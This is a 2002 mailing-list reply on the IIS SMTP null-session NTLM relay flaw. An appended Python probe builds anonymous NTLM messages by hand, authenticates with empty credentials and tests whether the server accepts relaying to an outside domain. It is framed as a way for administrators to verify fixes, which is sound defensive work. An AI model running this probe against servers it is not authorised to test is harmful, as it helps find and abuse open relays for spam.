From: Todd Sabin (tsabin@razor.bindview.com)
Date: Mon Mar 04 2002 - 22:23:02 CST
"Toni Lassila" <toni.lassila@mc-europe.com> writes:
> > Overview:
> > IIS comes with a small SMTP component. The default settings allow
> > anyone who can authenticate to it to relay email. Because the
> > authentication system supports NTLM, it is possible for anyone to
> > authenticate using null session credentials, and then relay email.
> >
> > Workarounds:
> > Disable the SMTP service.
> > Disable the ability of authenticated users to relay email.
> > Firewall off the SMTP service from untrusted networks.
>
> I suspect turning off NTLM authentication and allowing only Basic
> Authentication (with or without TLS),
I tried this, and it appears to be effective.
> or alternatively disabling
> null session access (details are in many MS KB) from the server
> are two possible workarounds as well. Disabling null sessions is
> one of those security features one should do when securing a
> Windows-based server anyway.
If by "disabling null sessions" you mean setting RestrictAnonymous to
1 or 2, then that is not effective. RestrictAnonymous doesn't disable
anonymous access, it just places additional restrictions on it. You
can still authenticate just fine with a null session when RA=2, and
that's all you need for relaying.
Todd
-- 
Todd Sabin <tas@webspan.net>  BindView RAZOR Team <tsabin@razor.bindview.com>
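Since RestrictAnonymous does not stop the null-session logon itself, the only dependable way to know whether a particular server still relays for it is to run the exchange the advisory describes and look at the reply codes. The probe below is an added example, not code from the advisory, from BindView or from Microsoft: it builds the NTLM NEGOTIATE and anonymous AUTHENTICATE messages by hand (field layout per MS-NLMP), drives SMTP AUTH NTLM with empty credentials, and then checks whether RCPT TO an outside domain is accepted. The target host, the sender and recipient addresses, and the scripted replies in FakeConn are all constructed here for illustration; FakeConn models a server with the advisory's defaults so the example runs offline.

```python
import base64
import socket
import struct

NTLMSSP = b"NTLMSSP\x00"
NEG_ANONYMOUS = 0x800                            # MS-NLMP NTLMSSP_ANONYMOUS
NEG_FLAGS = 0x1 | 0x4 | 0x200 | NEG_ANONYMOUS    # + Unicode, request target, NTLM

def _field(length, offset):
    """Len/MaxLen/BufferOffset triple describing one variable-length NTLM field."""
    return struct.pack("<HHI", length, length, offset)

def build_type1():
    """NEGOTIATE_MESSAGE with empty domain and workstation: a bare 32-byte header."""
    return NTLMSSP + struct.pack("<II", 1, NEG_FLAGS) + _field(0, 32) * 2

def parse_type2(msg):
    """Return the 8-byte ServerChallenge (offset 24) of a CHALLENGE_MESSAGE."""
    if len(msg) < 32 or msg[:8] != NTLMSSP or struct.unpack("<I", msg[8:12])[0] != 2:
        raise ValueError("not an NTLM type 2 message")
    return msg[24:32]

def build_type3_null_session(challenge):
    """AUTHENTICATE_MESSAGE for an anonymous (null session) logon, the MS-NLMP form:
    one-byte zero LM response, empty NT response, empty domain/user/workstation.
    The challenge is never used, so no password is needed: the advisory's point."""
    hdr = NTLMSSP + struct.pack("<I", 3) + _field(1, 64)   # LmChallengeResponse = Z(1) at 64
    hdr += _field(0, 65) * 5     # NtChallengeResponse, Domain, User, Workstation, SessionKey
    return hdr + struct.pack("<I", NEG_FLAGS) + b"\x00"    # flags at 60..64, then the body

def null_session_relay_check(conn, sender="probe@example.invalid", rcpt="relay-test@example.invalid"):
    """AUTH NTLM with null credentials, then ask to relay to an outside domain.
    Returns "auth-refused", "relay-denied" or "RELAY-OPEN". Only RCPT TO is
    issued, never DATA, so the probe does not actually send any mail."""
    conn.read_reply()                                   # 220 banner
    conn.send_line("EHLO probe")
    conn.read_reply()
    conn.send_line("AUTH NTLM " + base64.b64encode(build_type1()).decode())
    code, text = conn.read_reply()
    if code == 334:                                     # server sent its type 2 challenge
        type3 = build_type3_null_session(parse_type2(base64.b64decode(text)))
        conn.send_line(base64.b64encode(type3).decode())
        code, _ = conn.read_reply()
    if code != 235:
        verdict = "auth-refused"
    else:
        conn.send_line("MAIL FROM:<%s>" % sender)
        conn.read_reply()
        conn.send_line("RCPT TO:<%s>" % rcpt)
        verdict = "RELAY-OPEN" if conn.read_reply()[0] == 250 else "relay-denied"
    conn.send_line("QUIT")
    return verdict

class SocketConn:
    """Line-oriented SMTP transport over TCP; folds multi-line replies into one."""
    def __init__(self, host, port=25, timeout=10):
        self.f = socket.create_connection((host, port), timeout).makefile("rwb")
    def send_line(self, line):
        self.f.write(line.encode() + b"\r\n")
        self.f.flush()
    def read_reply(self):
        texts = []
        while True:
            raw = self.f.readline().decode(errors="replace").rstrip("\r\n")
            if len(raw) < 3:
                raise ConnectionError("server closed the connection")
            texts.append(raw[4:])
            if raw[3:4] != "-":         # "250-" continues the reply, "250 " ends it
                return int(raw[:3]), " ".join(texts)

class FakeConn:
    """Constructed stand-in for a server with the advisory's defaults (null-session NTLM
    accepted, authenticated users may relay); relays=False models the 'disable relaying'
    workaround. The challenge bytes are made up; nothing was captured from a real host."""
    def __init__(self, relays=True):
        self.relays, self.sent, self.challenge = relays, [], bytes(range(8))
        self.type2 = (NTLMSSP + struct.pack("<I", 2) + _field(0, 48) + struct.pack("<I", NEG_FLAGS)
                      + self.challenge + bytes(8) + _field(0, 48))
    def send_line(self, line):
        self.sent.append(line)
    def read_reply(self):
        last = self.sent[-1] if self.sent else ""
        if not last:
            return 220, "ready"
        if last.startswith(("EHLO", "MAIL FROM")):
            return 250, "ok"
        if last.startswith("RCPT TO"):
            return (250, "ok") if self.relays else (550, "relaying denied")
        if last.startswith("AUTH NTLM"):
            return 334, base64.b64encode(self.type2).decode()
        if last == "QUIT":
            return 221, "bye"
        try:                                            # anything else is the type 3 blob
            blob = base64.b64decode(last, validate=True)
            anon = blob[:8] == NTLMSSP and struct.unpack("<I", blob[60:64])[0] & NEG_ANONYMOUS
        except (ValueError, struct.error):
            anon = False
        return (235, "authenticated") if anon else (535, "authentication failed")
```

Against a real host, call `null_session_relay_check(SocketConn("mail.example.invalid"))` from a test network the server treats as untrusted; `null_session_relay_check(FakeConn())` returns "RELAY-OPEN" and `FakeConn(relays=False)` returns "relay-denied". A 235 for an empty user followed by a 250 on the outside RCPT is the condition the advisory describes, whatever RestrictAnonymous is set to; after switching the service to Basic-only authentication or turning off relaying for authenticated users, the verdict should change to "auth-refused" or "relay-denied" respectively.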